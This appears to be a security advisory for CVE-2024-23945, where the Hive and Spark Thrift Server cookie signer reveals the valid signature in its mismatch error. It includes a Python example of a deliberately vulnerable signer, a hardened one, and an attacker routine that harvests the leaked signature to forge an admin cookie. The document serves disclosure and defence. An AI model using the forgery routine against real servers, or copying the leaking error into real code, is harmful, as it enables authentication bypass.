Apache · Apache Spark · CVE-2024-23945
**Name of the Vulnerable Software and Affected Versions**
Apache Hive, every release from 1.2.0 (where HIVE-9710 introduced cookie-based authentication) up to the release that carries the fix
Apache Spark, every release from 2.0.0 (where SPARK-14987 inlined the Hive Thrift server) up to the release that carries the fix
**Description**
HiveServer2's HTTP transport, which the Spark Thrift Server reuses, issues signed cookies so that an authenticated client can be recognised on later requests without presenting credentials again. The cookie signature is the only thing stopping a client from editing the cookie's contents. The CookieSigner that produces and checks these signatures was introduced in Hive by HIVE-9710 (1.2.0) and carried into Spark by SPARK-14987 (2.0.0). Its defect is in the failure path: when a presented cookie's signature does not match, the error message includes both the signature the client sent and the signature the server computed for that cookie value. The computed signature is exactly what a genuine cookie for that value would carry, so anyone who can observe the error message can submit an attacker-chosen cookie value with a bogus signature, read the correct signature out of the rejection, and resubmit the same value with that signature, which the server then accepts. The affected artifacts are org.apache.hive:hive-service, org.apache.spark:spark-hive-thriftserver_2.11 and org.apache.spark:spark-hive-thriftserver_2.12.
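The verification path described above, as an added example that is not Hive's or Spark's own code: a signer modelled on the CookieSigner cookie format (payload, an `&s=` delimiter, a base64-encoded digest; the delimiter and the digest construction are assumptions for illustration), with the vulnerable mismatch message beside a hardened one, and an attacker routine that harvests the leaked signature from the error and replays it. The class and function names (`VulnerableCookieSigner`, `HardenedCookieSigner`, `forge_from_error`, `demo`) and the sample cookie values are hypothetical.

```python
import base64
import hashlib
import hmac
import secrets

# Delimiter between the cookie payload and its signature. Modelled on the
# "&s=" separator of the Hive/Spark CookieSigner (assumption for illustration).
SEPARATOR = "&s="


class VulnerableCookieSigner:
    """Illustrative signer whose verification error discloses the expected signature."""

    def __init__(self, secret: bytes) -> None:
        self.secret = secret

    def _signature(self, value: str) -> str:
        # Base64(SHA-256(value || secret)); the construction is assumed,
        # the leak below does not depend on it.
        digest = hashlib.sha256(value.encode() + self.secret).digest()
        return base64.b64encode(digest).decode()

    def sign(self, value: str) -> str:
        return value + SEPARATOR + self._signature(value)

    def verify_and_extract(self, signed: str) -> str:
        idx = signed.rfind(SEPARATOR)
        if idx == -1:
            raise ValueError("Invalid input sign")
        value, presented = signed[:idx], signed[idx + len(SEPARATOR):]
        expected = self._signature(value)
        if not hmac.compare_digest(presented.encode(), expected.encode()):
            # BUG: the server-computed ("current") signature is placed in the
            # error message, so whoever sees it now holds a valid signature
            # for the attacker-chosen value.
            raise ValueError(
                f"Invalid sign, original = {presented} current = {expected}"
            )
        return value


class HardenedCookieSigner(VulnerableCookieSigner):
    """Same cookie format, but the mismatch error carries nothing derived from the key."""

    def _signature(self, value: str) -> str:
        # HMAC-SHA256 keyed with the secret instead of a bare hash of value||secret.
        mac = hmac.new(self.secret, value.encode(), hashlib.sha256).digest()
        return base64.b64encode(mac).decode()

    def verify_and_extract(self, signed: str) -> str:
        idx = signed.rfind(SEPARATOR)
        if idx == -1:
            raise ValueError("Invalid cookie signature")
        value, presented = signed[:idx], signed[idx + len(SEPARATOR):]
        if not hmac.compare_digest(presented.encode(), self._signature(value).encode()):
            raise ValueError("Invalid cookie signature")  # generic: nothing to harvest
        return value


def forge_from_error(verify, target_value: str):
    """Attacker: send a bogus signature, read the 'current' one out of the error, replay it."""
    probe = target_value + SEPARATOR + "AAAA"
    try:
        verify(probe)
    except ValueError as exc:
        message = str(exc)
        marker = "current = "
        if marker in message:
            leaked = message[message.index(marker) + len(marker):].strip()
            return target_value + SEPARATOR + leaked
    return None


def demo(target_value: str = "cu=admin&rn=12345"):
    """Returns (value the vulnerable server accepts, forgery result against the hardened one)."""
    secret = secrets.token_bytes(32)  # the attacker never learns this
    vuln = VulnerableCookieSigner(secret)
    hard = HardenedCookieSigner(secret)
    forged = forge_from_error(vuln.verify_and_extract, target_value)
    accepted = vuln.verify_and_extract(forged) if forged else None
    return accepted, forge_from_error(hard.verify_and_extract, target_value)


if __name__ == "__main__":
    print(demo())
```

Against the vulnerable signer a single rejected request yields a signature that the same server then accepts for the attacker-chosen payload, without the attacker ever learning the secret. The generic error message is the substance of the fix; the keyed HMAC and constant-time comparison in the hardened class are ordinary good practice rather than part of this CVE.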
**Recommendations**
Apache Hive: upgrade to a release containing the fix for the CookieSigner mismatch message; the Apache Hive security advisory for CVE-2024-23945 names the first fixed release.
Apache Spark: upgrade to a release containing the fix; the Apache Spark security advisory for CVE-2024-23945 names the first fixed release.
Disabling the CookieSigner is not a workaround: it is the tamper protection itself, and removing it would leave cookie contents entirely unprotected. If the upgrade must wait, turn off cookie-based authentication on the HTTP transport instead (`hive.server2.thrift.http.cookie.auth.enabled=false`, honoured by both HiveServer2 and the Spark Thrift Server), accepting that every request then carries full credentials, or run the server in binary transport mode, where cookies are not used.
Restrict network access to the HiveServer2 and Spark Thrift Server HTTP endpoints (org.apache.hive:hive-service, org.apache.spark:spark-hive-thriftserver_2.11, org.apache.spark:spark-hive-thriftserver_2.12) to trusted clients, and check whether signature-mismatch errors reach clients in responses or land in logs that untrusted users can read.